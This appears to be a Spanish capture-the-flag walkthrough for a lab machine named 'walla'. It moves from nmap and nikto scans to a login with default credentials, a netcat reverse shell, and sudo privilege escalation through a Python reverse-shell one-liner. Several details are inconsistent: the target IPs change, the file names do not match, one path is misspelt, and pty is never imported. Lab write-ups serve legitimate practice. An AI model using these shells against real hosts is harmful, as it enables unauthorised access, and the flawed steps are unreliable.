nmap -A -p- -oA walla 192.168.235.97 --min-rate=10000 --script=vuln --script-timeout=15 -v

nmap -sC -sV -O -p- -oA walla 192.168.235.97

nmap -sU -O -p- -oA walla-udp 192.168.235.97

nikto -h 192.168.235.97:8091

Pasted image 20211030141209.png

Pasted image 20211030141322.png

whatweb http://10.129.199.42:8091

Pasted image 20211030141401.png

Nos dirigimos a http://10.129.199.42:8091

credenciales son las siguientes admin:secret

Pasted image 20211030140854.png

Nos dirigimos a System-> Console en el menu a mano izquierda

nc -nv 192.168.49.235 443 -e /bin/bash

nc -lvnp 443

Pasted image 20211030142048.png

sudo -l

Vemos el script de wifi_reset.py

Pasted image 20211030142313.png

echo 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.49.235",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);pty.spawn("/bin/bash")' > /home/walter/wificontroller.py

sudo /usr/bin/python /home/watler/wifi_reset.py

nc -lvnp 4444

Pasted image 20211030143306.png

boxes

copyright©2022 Cu3rv0x all rights reserved